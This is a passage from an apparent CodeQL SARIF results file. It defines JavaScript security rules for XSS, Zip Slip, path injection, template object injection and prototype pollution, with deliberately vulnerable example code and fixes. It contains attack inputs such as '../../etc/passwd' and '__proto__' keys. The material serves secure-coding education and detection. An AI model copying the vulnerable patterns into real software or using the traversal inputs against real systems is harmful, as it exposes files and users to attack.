cross-site scripting vulnerability.\n\nThis kind of vulnerability is also called *DOM-based* cross-site scripting, to distinguish it from other types of cross-site scripting.\n\n\n## Recommendation\nTo guard against cross-site scripting, consider using contextual output encoding/escaping before writing user input to the page, or one of the other solutions that are mentioned in the references.\n\n\n## Example\nThe following example shows part of the page URL being written directly to the document, leaving the website vulnerable to cross-site scripting.\n\n\n```javascript\nfunction setLanguageOptions() {\n var href = document.location.href,\n deflt = href.substring(href.indexOf(\"default=\")+8);\n document.write(\"\");\n document.write(\"\");\n}\n\n```\n\n## References\n* OWASP: [DOM based XSS Prevention Cheat Sheet](https://cheatsheetseries.owasp.org/cheatsheets/DOM_based_XSS_Prevention_Cheat_Sheet.html).\n* OWASP: [XSS (Cross Site Scripting) Prevention Cheat Sheet](https://cheatsheetseries.owasp.org/cheatsheets/Cross_Site_Scripting_Prevention_Cheat_Sheet.html).\n* OWASP [DOM Based XSS](https://www.owasp.org/index.php/DOM_Based_XSS).\n* OWASP [Types of Cross-Site Scripting](https://www.owasp.org/index.php/Types_of_Cross-Site_Scripting).\n* Wikipedia: [Cross-site scripting](http://en.wikipedia.org/wiki/Cross-site_scripting).\n* Common Weakness Enumeration: [CWE-79](https://cwe.mitre.org/data/definitions/79.html).\n* Common Weakness Enumeration: [CWE-116](https://cwe.mitre.org/data/definitions/116.html).\n" + }, + "properties" : { + "tags" : [ "security", "external/cwe/cwe-079", "external/cwe/cwe-116" ], + "description" : "Writing user input directly to the DOM allows for\n a cross-site scripting vulnerability.", + "id" : "js/xss", + "kind" : "path-problem", + "name" : "Client-side cross-site scripting", + "precision" : "high", + "problem.severity" : "error", + "security-severity" : "6.1" + } + }, { + "id" : "js/reflected-xss", + "name" : "js/reflected-xss", + 
"shortDescription" : { + "text" : "Reflected cross-site scripting" + }, + "fullDescription" : { + "text" : "Writing user input directly to an HTTP response allows for a cross-site scripting vulnerability." + }, + "defaultConfiguration" : { + "enabled" : true, + "level" : "error" + }, + "help" : { + "text" : "# Reflected cross-site scripting\nDirectly writing user input (for example, an HTTP request parameter) to an HTTP response without properly sanitizing the input first, allows for a cross-site scripting vulnerability.\n\nThis kind of vulnerability is also called *reflected* cross-site scripting, to distinguish it from other types of cross-site scripting.\n\n\n## Recommendation\nTo guard against cross-site scripting, consider using contextual output encoding/escaping before writing user input to the response, or one of the other solutions that are mentioned in the references.\n\n\n## Example\nThe following example code writes part of an HTTP request (which is controlled by the user) directly to the response. 
This leaves the website vulnerable to cross-site scripting.\n\n\n```javascript\nvar app = require('express')();\n\napp.get('/user/:id', function(req, res) {\n if (!isValidUserId(req.params.id))\n // BAD: a request parameter is incorporated without validation into the response\n res.send(\"Unknown user: \" + req.params.id);\n else\n // TODO: do something exciting\n ;\n});\n\n```\nSanitizing the user-controlled data prevents the vulnerability:\n\n\n```javascript\nvar escape = require('escape-html');\n\nvar app = require('express')();\n\napp.get('/user/:id', function(req, res) {\n if (!isValidUserId(req.params.id))\n // GOOD: request parameter is sanitized before incorporating it into the response\n res.send(\"Unknown user: \" + escape(req.params.id));\n else\n // TODO: do something exciting\n ;\n});\n\n```\n\n## References\n* OWASP: [XSS (Cross Site Scripting) Prevention Cheat Sheet](https://cheatsheetseries.owasp.org/cheatsheets/Cross_Site_Scripting_Prevention_Cheat_Sheet.html).\n* OWASP [Types of Cross-Site Scripting](https://www.owasp.org/index.php/Types_of_Cross-Site_Scripting).\n* Wikipedia: [Cross-site scripting](http://en.wikipedia.org/wiki/Cross-site_scripting).\n* Common Weakness Enumeration: [CWE-79](https://cwe.mitre.org/data/definitions/79.html).\n* Common Weakness Enumeration: [CWE-116](https://cwe.mitre.org/data/definitions/116.html).\n", + "markdown" : "# Reflected cross-site scripting\nDirectly writing user input (for example, an HTTP request parameter) to an HTTP response without properly sanitizing the input first, allows for a cross-site scripting vulnerability.\n\nThis kind of vulnerability is also called *reflected* cross-site scripting, to distinguish it from other types of cross-site scripting.\n\n\n## Recommendation\nTo guard against cross-site scripting, consider using contextual output encoding/escaping before writing user input to the response, or one of the other solutions that are mentioned in the references.\n\n\n## Example\nThe 
following example code writes part of an HTTP request (which is controlled by the user) directly to the response. This leaves the website vulnerable to cross-site scripting.\n\n\n```javascript\nvar app = require('express')();\n\napp.get('/user/:id', function(req, res) {\n if (!isValidUserId(req.params.id))\n // BAD: a request parameter is incorporated without validation into the response\n res.send(\"Unknown user: \" + req.params.id);\n else\n // TODO: do something exciting\n ;\n});\n\n```\nSanitizing the user-controlled data prevents the vulnerability:\n\n\n```javascript\nvar escape = require('escape-html');\n\nvar app = require('express')();\n\napp.get('/user/:id', function(req, res) {\n if (!isValidUserId(req.params.id))\n // GOOD: request parameter is sanitized before incorporating it into the response\n res.send(\"Unknown user: \" + escape(req.params.id));\n else\n // TODO: do something exciting\n ;\n});\n\n```\n\n## References\n* OWASP: [XSS (Cross Site Scripting) Prevention Cheat Sheet](https://cheatsheetseries.owasp.org/cheatsheets/Cross_Site_Scripting_Prevention_Cheat_Sheet.html).\n* OWASP [Types of Cross-Site Scripting](https://www.owasp.org/index.php/Types_of_Cross-Site_Scripting).\n* Wikipedia: [Cross-site scripting](http://en.wikipedia.org/wiki/Cross-site_scripting).\n* Common Weakness Enumeration: [CWE-79](https://cwe.mitre.org/data/definitions/79.html).\n* Common Weakness Enumeration: [CWE-116](https://cwe.mitre.org/data/definitions/116.html).\n" + }, + "properties" : { + "tags" : [ "security", "external/cwe/cwe-079", "external/cwe/cwe-116" ], + "description" : "Writing user input directly to an HTTP response allows for\n a cross-site scripting vulnerability.", + "id" : "js/reflected-xss", + "kind" : "path-problem", + "name" : "Reflected cross-site scripting", + "precision" : "high", + "problem.severity" : "error", + "security-severity" : "6.1" + } + }, { + "id" : "js/html-constructed-from-input", + "name" : "js/html-constructed-from-input", + 
"shortDescription" : { + "text" : "Unsafe HTML constructed from library input" + }, + "fullDescription" : { + "text" : "Using externally controlled strings to construct HTML might allow a malicious user to perform a cross-site scripting attack." + }, + "defaultConfiguration" : { + "enabled" : true, + "level" : "error" + }, + "help" : { + "text" : "# Unsafe HTML constructed from library input\nWhen a library function dynamically constructs HTML in a potentially unsafe way, then it's important to document to clients of the library that the function should only be used with trusted inputs. If the function is not documented as being potentially unsafe, then a client may inadvertently use inputs containing unsafe HTML fragments, and thereby leave the client vulnerable to cross-site scripting attacks.\n\n\n## Recommendation\nDocument all library functions that can lead to cross-site scripting attacks, and guard against unsafe inputs where dynamic HTML construction is not intended.\n\n\n## Example\nThe following example has a library function that renders a boldface name by writing to the `innerHTML` property of an element.\n\n\n```javascript\nmodule.exports = function showBoldName(name) {\n document.getElementById('name').innerHTML = \"\" + name + \"\";\n}\n\n```\nThis library function, however, does not escape unsafe HTML, and a client that calls the function with user-supplied input may be vulnerable to cross-site scripting attacks.\n\nThe library could either document that this function should not be used with unsafe inputs, or use safe APIs such as `innerText`.\n\n\n```javascript\nmodule.exports = function showBoldName(name) {\n const bold = document.createElement('b');\n bold.innerText = name;\n document.getElementById('name').appendChild(bold);\n}\n\n```\nAlternatively, an HTML sanitizer can be used to remove unsafe content.\n\n\n```javascript\n\nconst striptags = require('striptags');\nmodule.exports = function showBoldName(name) {\n 
document.getElementById('name').innerHTML = \"\" + striptags(name) + \"\";\n}\n\n```\n\n## References\n* OWASP: [DOM based XSS Prevention Cheat Sheet](https://www.owasp.org/index.php/DOM_based_XSS_Prevention_Cheat_Sheet).\n* OWASP: [XSS (Cross Site Scripting) Prevention Cheat Sheet](https://www.owasp.org/index.php/XSS_%28Cross_Site_Scripting%29_Prevention_Cheat_Sheet).\n* OWASP [DOM Based XSS](https://www.owasp.org/index.php/DOM_Based_XSS).\n* OWASP [Types of Cross-Site Scripting](https://www.owasp.org/index.php/Types_of_Cross-Site_Scripting).\n* Wikipedia: [Cross-site scripting](http://en.wikipedia.org/wiki/Cross-site_scripting).\n* Common Weakness Enumeration: [CWE-79](https://cwe.mitre.org/data/definitions/79.html).\n* Common Weakness Enumeration: [CWE-116](https://cwe.mitre.org/data/definitions/116.html).\n", + "markdown" : "# Unsafe HTML constructed from library input\nWhen a library function dynamically constructs HTML in a potentially unsafe way, then it's important to document to clients of the library that the function should only be used with trusted inputs. 
If the function is not documented as being potentially unsafe, then a client may inadvertently use inputs containing unsafe HTML fragments, and thereby leave the client vulnerable to cross-site scripting attacks.\n\n\n## Recommendation\nDocument all library functions that can lead to cross-site scripting attacks, and guard against unsafe inputs where dynamic HTML construction is not intended.\n\n\n## Example\nThe following example has a library function that renders a boldface name by writing to the `innerHTML` property of an element.\n\n\n```javascript\nmodule.exports = function showBoldName(name) {\n document.getElementById('name').innerHTML = \"\" + name + \"\";\n}\n\n```\nThis library function, however, does not escape unsafe HTML, and a client that calls the function with user-supplied input may be vulnerable to cross-site scripting attacks.\n\nThe library could either document that this function should not be used with unsafe inputs, or use safe APIs such as `innerText`.\n\n\n```javascript\nmodule.exports = function showBoldName(name) {\n const bold = document.createElement('b');\n bold.innerText = name;\n document.getElementById('name').appendChild(bold);\n}\n\n```\nAlternatively, an HTML sanitizer can be used to remove unsafe content.\n\n\n```javascript\n\nconst striptags = require('striptags');\nmodule.exports = function showBoldName(name) {\n document.getElementById('name').innerHTML = \"\" + striptags(name) + \"\";\n}\n\n```\n\n## References\n* OWASP: [DOM based XSS Prevention Cheat Sheet](https://www.owasp.org/index.php/DOM_based_XSS_Prevention_Cheat_Sheet).\n* OWASP: [XSS (Cross Site Scripting) Prevention Cheat Sheet](https://www.owasp.org/index.php/XSS_%28Cross_Site_Scripting%29_Prevention_Cheat_Sheet).\n* OWASP [DOM Based XSS](https://www.owasp.org/index.php/DOM_Based_XSS).\n* OWASP [Types of Cross-Site Scripting](https://www.owasp.org/index.php/Types_of_Cross-Site_Scripting).\n* Wikipedia: [Cross-site 
scripting](http://en.wikipedia.org/wiki/Cross-site_scripting).\n* Common Weakness Enumeration: [CWE-79](https://cwe.mitre.org/data/definitions/79.html).\n* Common Weakness Enumeration: [CWE-116](https://cwe.mitre.org/data/definitions/116.html).\n" + }, + "properties" : { + "tags" : [ "security", "external/cwe/cwe-079", "external/cwe/cwe-116" ], + "description" : "Using externally controlled strings to construct HTML might allow a malicious\n user to perform a cross-site scripting attack.", + "id" : "js/html-constructed-from-input", + "kind" : "path-problem", + "name" : "Unsafe HTML constructed from library input", + "precision" : "high", + "problem.severity" : "error", + "security-severity" : "6.1" + } + }, { + "id" : "js/stored-xss", + "name" : "js/stored-xss", + "shortDescription" : { + "text" : "Stored cross-site scripting" + }, + "fullDescription" : { + "text" : "Using uncontrolled stored values in HTML allows for a stored cross-site scripting vulnerability." + }, + "defaultConfiguration" : { + "enabled" : true, + "level" : "error" + }, + "help" : { + "text" : "# Stored cross-site scripting\nDirectly using uncontrolled stored value (for example, file names) to create HTML content without properly sanitizing the input first, allows for a cross-site scripting vulnerability.\n\nThis kind of vulnerability is also called *stored* cross-site scripting, to distinguish it from other types of cross-site scripting.\n\n\n## Recommendation\nTo guard against cross-site scripting, consider using contextual output encoding/escaping before using uncontrolled stored values to create HTML content, or one of the other solutions that are mentioned in the references.\n\n\n## Example\nThe following example code writes file names directly to a HTTP response. 
This leaves the website vulnerable to cross-site scripting, if an attacker can choose the file names on the disk.\n\n\n```javascript\nvar express = require('express'),\n fs = require('fs');\n\nexpress().get('/list-directory', function(req, res) {\n fs.readdir('/public', function (error, fileNames) {\n var list = '
    ';\n fileNames.forEach(fileName => {\n // BAD: `fileName` can contain HTML elements\n list += '
  • ' + fileName + '
  • ';\n });\n list += '
'\n res.send(list);\n });\n});\n\n```\nSanitizing the file names prevents the vulnerability:\n\n\n```javascript\nvar express = require('express'),\n fs = require('fs'),\n escape = require('escape-html');\n\nexpress().get('/list-directory', function(req, res) {\n fs.readdir('/public', function (error, fileNames) {\n var list = '
    ';\n fileNames.forEach(fileName => {\n // GOOD: escaped `fileName` can not contain HTML elements\n list += '
  • ' + escape(fileName) + '
  • ';\n });\n list += '
'\n res.send(list);\n });\n});\n\n```\n\n## References\n* OWASP: [XSS (Cross Site Scripting) Prevention Cheat Sheet](https://cheatsheetseries.owasp.org/cheatsheets/Cross_Site_Scripting_Prevention_Cheat_Sheet.html).\n* OWASP [Types of Cross-Site Scripting](https://www.owasp.org/index.php/Types_of_Cross-Site_Scripting).\n* Wikipedia: [Cross-site scripting](http://en.wikipedia.org/wiki/Cross-site_scripting).\n* Common Weakness Enumeration: [CWE-79](https://cwe.mitre.org/data/definitions/79.html).\n* Common Weakness Enumeration: [CWE-116](https://cwe.mitre.org/data/definitions/116.html).\n", + "markdown" : "# Stored cross-site scripting\nDirectly using uncontrolled stored value (for example, file names) to create HTML content without properly sanitizing the input first, allows for a cross-site scripting vulnerability.\n\nThis kind of vulnerability is also called *stored* cross-site scripting, to distinguish it from other types of cross-site scripting.\n\n\n## Recommendation\nTo guard against cross-site scripting, consider using contextual output encoding/escaping before using uncontrolled stored values to create HTML content, or one of the other solutions that are mentioned in the references.\n\n\n## Example\nThe following example code writes file names directly to a HTTP response. This leaves the website vulnerable to cross-site scripting, if an attacker can choose the file names on the disk.\n\n\n```javascript\nvar express = require('express'),\n fs = require('fs');\n\nexpress().get('/list-directory', function(req, res) {\n fs.readdir('/public', function (error, fileNames) {\n var list = '
    ';\n fileNames.forEach(fileName => {\n // BAD: `fileName` can contain HTML elements\n list += '
  • ' + fileName + '
  • ';\n });\n list += '
'\n res.send(list);\n });\n});\n\n```\nSanitizing the file names prevents the vulnerability:\n\n\n```javascript\nvar express = require('express'),\n fs = require('fs'),\n escape = require('escape-html');\n\nexpress().get('/list-directory', function(req, res) {\n fs.readdir('/public', function (error, fileNames) {\n var list = '
    ';\n fileNames.forEach(fileName => {\n // GOOD: escaped `fileName` can not contain HTML elements\n list += '
  • ' + escape(fileName) + '
  • ';\n });\n list += '
'\n res.send(list);\n });\n});\n\n```\n\n## References\n* OWASP: [XSS (Cross Site Scripting) Prevention Cheat Sheet](https://cheatsheetseries.owasp.org/cheatsheets/Cross_Site_Scripting_Prevention_Cheat_Sheet.html).\n* OWASP [Types of Cross-Site Scripting](https://www.owasp.org/index.php/Types_of_Cross-Site_Scripting).\n* Wikipedia: [Cross-site scripting](http://en.wikipedia.org/wiki/Cross-site_scripting).\n* Common Weakness Enumeration: [CWE-79](https://cwe.mitre.org/data/definitions/79.html).\n* Common Weakness Enumeration: [CWE-116](https://cwe.mitre.org/data/definitions/116.html).\n" + }, + "properties" : { + "tags" : [ "security", "external/cwe/cwe-079", "external/cwe/cwe-116" ], + "description" : "Using uncontrolled stored values in HTML allows for\n a stored cross-site scripting vulnerability.", + "id" : "js/stored-xss", + "kind" : "path-problem", + "name" : "Stored cross-site scripting", + "precision" : "high", + "problem.severity" : "error", + "security-severity" : "6.1" + } + }, { + "id" : "js/zipslip", + "name" : "js/zipslip", + "shortDescription" : { + "text" : "Arbitrary file access during archive extraction (\"Zip Slip\")" + }, + "fullDescription" : { + "text" : "Extracting files from a malicious ZIP file, or similar type of archive, without validating that the destination file path is within the destination directory can allow an attacker to unexpectedly gain access to resources." + }, + "defaultConfiguration" : { + "enabled" : true, + "level" : "error" + }, + "help" : { + "text" : "# Arbitrary file access during archive extraction (\"Zip Slip\")\nExtracting files from a malicious zip file, or similar type of archive, is at risk of directory traversal attacks if filenames from the archive are not properly validated. archive paths.\n\nZip archives contain archive entries representing each file in the archive. 
These entries include a file path for the entry, but these file paths are not restricted and may contain unexpected special elements such as the directory traversal element (`..`). If these file paths are used to create a filesystem path, then a file operation may happen in an unexpected location. This can result in sensitive information being revealed or deleted, or an attacker being able to influence behavior by modifying unexpected files.\n\nFor example, if a zip file contains a file entry `..\\sneaky-file`, and the zip file is extracted to the directory `c:\\output`, then naively combining the paths would result in an output file path of `c:\\output\\..\\sneaky-file`, which would cause the file to be written to `c:\\sneaky-file`.\n\n\n## Recommendation\nEnsure that output paths constructed from zip archive entries are validated to prevent writing files to unexpected locations.\n\nThe recommended way of writing an output file from a zip archive entry is to check that `\"..\"` does not occur in the path.\n\n\n## Example\nIn this example an archive is extracted without validating file paths. 
If `archive.zip` contained relative paths (for instance, if it were created by something like `zip archive.zip ../file.txt`) then executing this code could write to locations outside the destination directory.\n\n\n```javascript\nconst fs = require('fs');\nconst unzip = require('unzip');\n\nfs.createReadStream('archive.zip')\n .pipe(unzip.Parse())\n .on('entry', entry => {\n const fileName = entry.path;\n // BAD: This could write any file on the filesystem.\n entry.pipe(fs.createWriteStream(fileName));\n });\n\n```\nTo fix this vulnerability, we need to check that the path does not contain any `\"..\"` elements in it.\n\n\n```javascript\nconst fs = require('fs');\nconst unzip = require('unzip');\n\nfs.createReadStream('archive.zip')\n .pipe(unzip.Parse())\n .on('entry', entry => {\n const fileName = entry.path;\n // GOOD: ensures the path is safe to write to.\n if (fileName.indexOf('..') == -1) {\n entry.pipe(fs.createWriteStream(fileName));\n }\n else {\n console.log('skipping bad path', fileName);\n }\n });\n\n```\n\n## References\n* Snyk: [Zip Slip Vulnerability](https://snyk.io/research/zip-slip-vulnerability).\n* OWASP: [Path Traversal](https://owasp.org/www-community/attacks/Path_Traversal).\n* Common Weakness Enumeration: [CWE-22](https://cwe.mitre.org/data/definitions/22.html).\n", + "markdown" : "# Arbitrary file access during archive extraction (\"Zip Slip\")\nExtracting files from a malicious zip file, or similar type of archive, is at risk of directory traversal attacks if filenames from the archive are not properly validated. archive paths.\n\nZip archives contain archive entries representing each file in the archive. These entries include a file path for the entry, but these file paths are not restricted and may contain unexpected special elements such as the directory traversal element (`..`). If these file paths are used to create a filesystem path, then a file operation may happen in an unexpected location. 
This can result in sensitive information being revealed or deleted, or an attacker being able to influence behavior by modifying unexpected files.\n\nFor example, if a zip file contains a file entry `..\\sneaky-file`, and the zip file is extracted to the directory `c:\\output`, then naively combining the paths would result in an output file path of `c:\\output\\..\\sneaky-file`, which would cause the file to be written to `c:\\sneaky-file`.\n\n\n## Recommendation\nEnsure that output paths constructed from zip archive entries are validated to prevent writing files to unexpected locations.\n\nThe recommended way of writing an output file from a zip archive entry is to check that `\"..\"` does not occur in the path.\n\n\n## Example\nIn this example an archive is extracted without validating file paths. If `archive.zip` contained relative paths (for instance, if it were created by something like `zip archive.zip ../file.txt`) then executing this code could write to locations outside the destination directory.\n\n\n```javascript\nconst fs = require('fs');\nconst unzip = require('unzip');\n\nfs.createReadStream('archive.zip')\n .pipe(unzip.Parse())\n .on('entry', entry => {\n const fileName = entry.path;\n // BAD: This could write any file on the filesystem.\n entry.pipe(fs.createWriteStream(fileName));\n });\n\n```\nTo fix this vulnerability, we need to check that the path does not contain any `\"..\"` elements in it.\n\n\n```javascript\nconst fs = require('fs');\nconst unzip = require('unzip');\n\nfs.createReadStream('archive.zip')\n .pipe(unzip.Parse())\n .on('entry', entry => {\n const fileName = entry.path;\n // GOOD: ensures the path is safe to write to.\n if (fileName.indexOf('..') == -1) {\n entry.pipe(fs.createWriteStream(fileName));\n }\n else {\n console.log('skipping bad path', fileName);\n }\n });\n\n```\n\n## References\n* Snyk: [Zip Slip Vulnerability](https://snyk.io/research/zip-slip-vulnerability).\n* OWASP: [Path 
Traversal](https://owasp.org/www-community/attacks/Path_Traversal).\n* Common Weakness Enumeration: [CWE-22](https://cwe.mitre.org/data/definitions/22.html).\n" + }, + "properties" : { + "tags" : [ "security", "external/cwe/cwe-022" ], + "description" : "Extracting files from a malicious ZIP file, or similar type of archive, without\n validating that the destination file path is within the destination directory\n can allow an attacker to unexpectedly gain access to resources.", + "id" : "js/zipslip", + "kind" : "path-problem", + "name" : "Arbitrary file access during archive extraction (\"Zip Slip\")", + "precision" : "high", + "problem.severity" : "error", + "security-severity" : "7.5" + } + }, { + "id" : "js/path-injection", + "name" : "js/path-injection", + "shortDescription" : { + "text" : "Uncontrolled data used in path expression" + }, + "fullDescription" : { + "text" : "Accessing paths influenced by users can allow an attacker to access unexpected resources." + }, + "defaultConfiguration" : { + "enabled" : true, + "level" : "error" + }, + "help" : { + "text" : "# Uncontrolled data used in path expression\nAccessing files using paths constructed from user-controlled data can allow an attacker to access unexpected resources. This can result in sensitive information being revealed or deleted, or an attacker being able to influence behavior by modifying unexpected files.\n\n\n## Recommendation\nValidate user input before using it to construct a file path, either using an off-the-shelf library like the `sanitize-filename` npm package, or by performing custom validation.\n\nIdeally, follow these rules:\n\n* Do not allow more than a single \".\" character.\n* Do not allow directory separators such as \"/\" or \"\\\\\" (depending on the file system).\n* Do not rely on simply replacing problematic sequences such as \"../\". 
For example, after applying this filter to \".../...//\", the resulting string would still be \"../\".\n* Use a whitelist of known good patterns.\n\n## Example\nIn the first example, a file name is read from an HTTP request and then used to access a file. However, a malicious user could enter a file name which is an absolute path, such as `\"/etc/passwd\"`.\n\nIn the second example, it appears that the user is restricted to opening a file within the `\"user\"` home directory. However, a malicious user could enter a file name containing special characters. For example, the string `\"../../etc/passwd\"` will result in the code reading the file located at `\"/home/user/../../etc/passwd\"`, which is the system's password file. This file would then be sent back to the user, giving them access to all the system's passwords.\n\n\n```javascript\nvar fs = require('fs'),\n http = require('http'),\n url = require('url');\n\nvar server = http.createServer(function(req, res) {\n let path = url.parse(req.url, true).query.path;\n\n // BAD: This could read any file on the file system\n res.write(fs.readFileSync(path));\n\n // BAD: This could still read any file on the file system\n res.write(fs.readFileSync(\"/home/user/\" + path));\n});\n\n```\n\n## References\n* OWASP: [Path Traversal](https://owasp.org/www-community/attacks/Path_Traversal).\n* npm: [sanitize-filename](https://www.npmjs.com/package/sanitize-filename) package.\n* Common Weakness Enumeration: [CWE-22](https://cwe.mitre.org/data/definitions/22.html).\n* Common Weakness Enumeration: [CWE-23](https://cwe.mitre.org/data/definitions/23.html).\n* Common Weakness Enumeration: [CWE-36](https://cwe.mitre.org/data/definitions/36.html).\n* Common Weakness Enumeration: [CWE-73](https://cwe.mitre.org/data/definitions/73.html).\n* Common Weakness Enumeration: [CWE-99](https://cwe.mitre.org/data/definitions/99.html).\n", + "markdown" : "# Uncontrolled data used in path expression\nAccessing files using paths constructed from 
user-controlled data can allow an attacker to access unexpected resources. This can result in sensitive information being revealed or deleted, or an attacker being able to influence behavior by modifying unexpected files.\n\n\n## Recommendation\nValidate user input before using it to construct a file path, either using an off-the-shelf library like the `sanitize-filename` npm package, or by performing custom validation.\n\nIdeally, follow these rules:\n\n* Do not allow more than a single \".\" character.\n* Do not allow directory separators such as \"/\" or \"\\\\\" (depending on the file system).\n* Do not rely on simply replacing problematic sequences such as \"../\". For example, after applying this filter to \".../...//\", the resulting string would still be \"../\".\n* Use a whitelist of known good patterns.\n\n## Example\nIn the first example, a file name is read from an HTTP request and then used to access a file. However, a malicious user could enter a file name which is an absolute path, such as `\"/etc/passwd\"`.\n\nIn the second example, it appears that the user is restricted to opening a file within the `\"user\"` home directory. However, a malicious user could enter a file name containing special characters. For example, the string `\"../../etc/passwd\"` will result in the code reading the file located at `\"/home/user/../../etc/passwd\"`, which is the system's password file. 
This file would then be sent back to the user, giving them access to all the system's passwords.\n\n\n```javascript\nvar fs = require('fs'),\n http = require('http'),\n url = require('url');\n\nvar server = http.createServer(function(req, res) {\n let path = url.parse(req.url, true).query.path;\n\n // BAD: This could read any file on the file system\n res.write(fs.readFileSync(path));\n\n // BAD: This could still read any file on the file system\n res.write(fs.readFileSync(\"/home/user/\" + path));\n});\n\n```\n\n## References\n* OWASP: [Path Traversal](https://owasp.org/www-community/attacks/Path_Traversal).\n* npm: [sanitize-filename](https://www.npmjs.com/package/sanitize-filename) package.\n* Common Weakness Enumeration: [CWE-22](https://cwe.mitre.org/data/definitions/22.html).\n* Common Weakness Enumeration: [CWE-23](https://cwe.mitre.org/data/definitions/23.html).\n* Common Weakness Enumeration: [CWE-36](https://cwe.mitre.org/data/definitions/36.html).\n* Common Weakness Enumeration: [CWE-73](https://cwe.mitre.org/data/definitions/73.html).\n* Common Weakness Enumeration: [CWE-99](https://cwe.mitre.org/data/definitions/99.html).\n" + }, + "properties" : { + "tags" : [ "security", "external/cwe/cwe-022", "external/cwe/cwe-023", "external/cwe/cwe-036", "external/cwe/cwe-073", "external/cwe/cwe-099" ], + "description" : "Accessing paths influenced by users can allow an attacker to access\n unexpected resources.", + "id" : "js/path-injection", + "kind" : "path-problem", + "name" : "Uncontrolled data used in path expression", + "precision" : "high", + "problem.severity" : "error", + "security-severity" : "7.5" + } + }, { + "id" : "js/template-object-injection", + "name" : "js/template-object-injection", + "shortDescription" : { + "text" : "Template Object Injection" + }, + "fullDescription" : { + "text" : "Instantiating a template using a user-controlled object is vulnerable to local file read and potential remote code execution." 
+ }, + "defaultConfiguration" : { + "enabled" : true, + "level" : "error" + }, + "help" : { + "text" : "# Template Object Injection\nDirectly using user-controlled objects as arguments to template engines might allow an attacker to do local file reads or even remote code execution.\n\n\n## Recommendation\nAvoid using user-controlled objects as arguments to a template engine. Instead, construct the object explicitly with the specific properties needed by the template.\n\n\n## Example\nIn the example below a server uses the user-controlled `profile` object to render the `index` template.\n\n\n```javascript\nvar app = require('express')();\napp.set('view engine', 'hbs');\n\napp.post('/', function (req, res, next) {\n var profile = req.body.profile;\n res.render('index', profile);\n});\n```\nHowever, if an attacker adds a `layout` property to the `profile` object then the server will load the file specified by the `layout` property, thereby allowing an attacker to do local file reads.\n\nThe fix is to have the server construct the object, and only add the properties that are needed by the template.\n\n\n```javascript\nvar app = require('express')();\napp.set('view engine', 'hbs');\n\napp.post('/', function (req, res, next) {\n var profile = req.body.profile;\n res.render('index', {\n name: profile.name,\n location: profile.location\n });\n});\n```\n\n## References\n* blog.shoebpatel.com: [The Secret Parameter, LFR, and Potential RCE in NodeJS Apps](https://blog.shoebpatel.com/2021/01/23/The-Secret-Parameter-LFR-and-Potential-RCE-in-NodeJS-Apps/).\n* cwe.mitre.org: [CWE-73: External Control of File Name or Path](https://cwe.mitre.org/data/definitions/73.html)\n* Common Weakness Enumeration: [CWE-73](https://cwe.mitre.org/data/definitions/73.html).\n* Common Weakness Enumeration: [CWE-94](https://cwe.mitre.org/data/definitions/94.html).\n", + "markdown" : "# Template Object Injection\nDirectly using user-controlled objects as arguments to template engines might allow an 
attacker to do local file reads or even remote code execution.\n\n\n## Recommendation\nAvoid using user-controlled objects as arguments to a template engine. Instead, construct the object explicitly with the specific properties needed by the template.\n\n\n## Example\nIn the example below a server uses the user-controlled `profile` object to render the `index` template.\n\n\n```javascript\nvar app = require('express')();\napp.set('view engine', 'hbs');\n\napp.post('/', function (req, res, next) {\n var profile = req.body.profile;\n res.render('index', profile);\n});\n```\nHowever, if an attacker adds a `layout` property to the `profile` object then the server will load the file specified by the `layout` property, thereby allowing an attacker to do local file reads.\n\nThe fix is to have the server construct the object, and only add the properties that are needed by the template.\n\n\n```javascript\nvar app = require('express')();\napp.set('view engine', 'hbs');\n\napp.post('/', function (req, res, next) {\n var profile = req.body.profile;\n res.render('index', {\n name: profile.name,\n location: profile.location\n });\n});\n```\n\n## References\n* blog.shoebpatel.com: [The Secret Parameter, LFR, and Potential RCE in NodeJS Apps](https://blog.shoebpatel.com/2021/01/23/The-Secret-Parameter-LFR-and-Potential-RCE-in-NodeJS-Apps/).\n* cwe.mitre.org: [CWE-73: External Control of File Name or Path](https://cwe.mitre.org/data/definitions/73.html)\n* Common Weakness Enumeration: [CWE-73](https://cwe.mitre.org/data/definitions/73.html).\n* Common Weakness Enumeration: [CWE-94](https://cwe.mitre.org/data/definitions/94.html).\n" + }, + "properties" : { + "tags" : [ "security", "external/cwe/cwe-073", "external/cwe/cwe-094" ], + "description" : "Instantiating a template using a user-controlled object is vulnerable to local file read and potential remote code execution.", + "id" : "js/template-object-injection", + "kind" : "path-problem", + "name" : "Template Object Injection", 
+ "precision" : "high", + "problem.severity" : "error", + "security-severity" : "9.3" + } + }, { + "id" : "js/prototype-polluting-assignment", + "name" : "js/prototype-polluting-assignment", + "shortDescription" : { + "text" : "Prototype-polluting assignment" + }, + "fullDescription" : { + "text" : "Modifying an object obtained via a user-controlled property name may lead to accidental mutation of the built-in Object prototype, and possibly escalate to remote code execution or cross-site scripting." + }, + "defaultConfiguration" : { + "enabled" : true, + "level" : "warning" + }, + "help" : { + "text" : "# Prototype-polluting assignment\nMost JavaScript objects inherit the properties of the built-in `Object.prototype` object. Prototype pollution is a type of vulnerability in which an attacker is able to modify `Object.prototype`. Since most objects inherit from the compromised `Object.prototype` object, the attacker can use this to tamper with the application logic, and often escalate to remote code execution or cross-site scripting.\n\nOne way to cause prototype pollution is by modifying an object obtained via a user-controlled property name. Most objects have a special `__proto__` property that refers to `Object.prototype`. An attacker can abuse this special property to trick the application into performing unintended modifications of `Object.prototype`.\n\n\n## Recommendation\nUse an associative data structure that is resilient to untrusted key values, such as a [Map](https://developer.mozilla.org/en-US/docs/Web/JavaScript/Reference/Global_Objects/Map). 
In some cases, a prototype-less object created with [Object.create(null)](https://developer.mozilla.org/en-US/docs/Web/JavaScript/Reference/Global_Objects/Object/create) may be preferable.\n\nAlternatively, restrict the computed property name so it can't clash with a built-in property, either by prefixing it with a constant string, or by rejecting inputs that don't conform to the expected format.\n\n\n## Example\nIn the example below, the untrusted value `req.params.id` is used as the property name `req.session.todos[id]`. If a malicious user passes in the ID value `__proto__`, the variable `items` will then refer to `Object.prototype`. Finally, the modification of `items` then allows the attacker to inject arbitrary properties onto `Object.prototype`.\n\n\n```javascript\nlet express = require('express');\nlet app = express()\n\napp.put('/todos/:id', (req, res) => {\n let id = req.params.id;\n let items = req.session.todos[id];\n if (!items) {\n items = req.session.todos[id] = {};\n }\n items[req.query.name] = req.query.text;\n res.end(200);\n});\n\n```\nOne way to fix this is to use [Map](https://developer.mozilla.org/en-US/docs/Web/JavaScript/Reference/Global_Objects/Map) objects to associate key/value pairs instead of regular objects, as shown 